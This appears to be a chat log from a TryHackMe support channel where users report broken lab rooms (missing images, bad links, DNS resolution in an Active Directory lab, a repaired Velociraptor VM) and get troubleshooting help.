when the ip has been used to serve malware in the past????
IP addresses are reused all the time
There's nothing wrong with copying and pasting an IP address into cyberchef
oh okay then
just think it might be setting a dangerous precedent that people will try and also copy the eml files containing the malware off the target machine if they have to copy the ip off the target machine
That's literally the slippery slope fallacy
well yeah probably
Room Linux Modules, task 7, images are missing.
seems like that might be the issue that we already have with imgur links but not sure
Blaster windows machine problem. There is no search history on that windows machine's browser. So how can i find the CVE details to go forward?
Room url: https://tryhackme.com/room/redteamcapstonechallenge
Issue: Task 2, link to TheReserve Swift mistyped and not working as is
Desc: The link contains a semi-colon in the end, and doesn't work directly. Easily fixed, though not working as intended.
Hello, I wonder if the machine JUMPBOX is broken, I can't access the port 80 for some reason, is that normal?
first, thank you for replying to me, I'm sorry I'm just responding to you now,
Well, I have a membership in THM, and it's the first time I don't have internet in the machine, and like @rugged canyon said, I split the screen. Should I connect to the machine through VMware?
Gave +1 Rep to @eternal summit
I tried it and it's not working
and well, it's not working, so I think I found a bug or something else
but how will I copy the IP address?
when you get an email, you see an email address, not an IP address 😐
so do you want me to copy the file to the clipboard, and then paste the file into cyberchef on my machine?
so I tried it, and it copies the file path, and not the file.
Please disable pinging when replying to messages I've sent 🙂
@eternal summit @hazy tiger @rugged canyon
so the short answer is I need to google the answer, not learn, and just get the answer from someone else who did it and posted the answers?
I don't like to learn in this way >.>
Alright, stop pinging me
ok
you take part it so sorry
I didn't say that.
well I choose copy
I go to clipboard and get the path
.... you open the .eml file in thunderbird....
you open the view source part...
you mark out the ip....
you right click and click copy....
you open the box that you opened called clipboard....
you copy the ip....
you go on your host and open cyberchef....
you paste in the ip in the input field...
you use the defang option...
TADA
it's not so TADA if the task discusses something, and in the machine it's not there
but I think I get it
I will ask my question in #room-help
@pallid grove This is not a room bug, please use #room-help for help with rooms and only post here when you're sure there's a bug.
James I understand, someone from the admins said to post here,
before I post here I post in #room-help , and from there said to post here.
@pallid grove Shadow is not an admin and shouldn't have guided you here for this.
shadow did an oopsie by believing in a fallacy for this room and therefore redirected it here
Where you provided help above, that should have been in #room-help
also true
Room URL: https://tryhackme.com/room/exploitingad
Summary: Service not starting
Hi, I'm encountering an issue from Exploiting AD room using my Kali box. It is unable to resolve the domain name thmserver2.za.tryhackme.loc.
Additional Notes:
Here are the troubleshooting steps I have taken so far:
- Followed the instructions provided in the room:
  a) Changed the DNS server to THMChildDC IP.
  b) Restarted the network interface.
  c) Tried using nslookup, but it did not work.
- All target IP addresses are pingable, but their domains are not.
- Tried changing the DNS server using nmtui and removed the public DNS (e.g., 1.1.1.1), leaving only the THMChildDC IP to force the domain to resolve using THMCHILDDC. However, neither of these steps resolved the issue.
- Restarted both my PC and the laboratory environment.
- Regenerated the VPN profile.
- As a sanity check, I followed the same instructions in other rooms such as breaching AD, Enumerating AD, and lateral movement, and did not encounter any problems.
If you restart the network interface, you'll reset the /etc/resolv.conf
Hello, the room "Jumpbox" seems to be broken. Only 22 port is open.
Well, it's weird, but editing the resolv.conf didn't solve the issue. However, after editing the resolv.conf and then restarting the interface, my issue was resolved. Thank you! I have been troubleshooting this issue since yesterday, LOL.
Gave +1 Rep to @quaint sparrow
Let's blame DNS
~~It's always DNS! LOL ~~
Hello, Thanks you for all your work, sorry to ask that, but any update on the velociraptor bug? (only room missing for my SOC lvl1 ^^)?
Gave +1 Rep to @dusky junco
Hey there, I should have an update within the next couple of hours. Working on it! 😁
Hey! Pleased to say I've attached a new working VM to Task 2 of the Velociraptor room. Sorry for the delay - it wasn't a quick fix.
I've put in steps to prevent this in the future 🙂
cc @silk ferry @mighty lynx @wheat fractal @keen sluice @unreal bough @hardy zealot
Thanks!
@dusky junco Merci !
Thank you Cmnatic!
now I can finish the SOC 1 path 😄
Gave +1 Rep to @dusky junco
This is for the Velociraptor room Task 5. Subtask 4 "There is hidden text in a file located in the Admin's Documents folder. What is the flag?"
Someone's talking in the #room-help but it also might be a bug. I'm not 100% sure how ADS works in NTFS but I followed the instructions. I'm looking in the NTFS accessor and I don't see a file in the admin's documents. I've clicked the recursive documents sync button a few times with no luck.
Spoiler warning below for the location (but if you follow the instructions the picture gives you basically the same information)
What’s up with the 504 error in the Web Fundamentals Path? I can’t access the URL on my VM for ‘Walking An Application.’
Yeah, started the machine in task 1. I used it for task 3 and 4 but it got stuck in task 5. I’ve tried restarting, same error. 🥲
Let me shut it down completely and try from the start.
Thanks @quaint sparrow
Apparently it was the IP. It hadn't refreshed from my last session so I started the THM site afresh and was assigned a new IP.
Gave +1 Rep to @quaint sparrow
Good, happy hacking.
https://tryhackme.com/room/rppsempire
two things: 1. empire is deprecated 2. imgur links are broken
Hi, I keep getting the error connect: Network Unreachable, when I try to whois facebook.com, I'm unsure how I'm supposed to answer the following questions, is it a fault on my part or?
Unless you're a subscriber, the attackbox does not have internet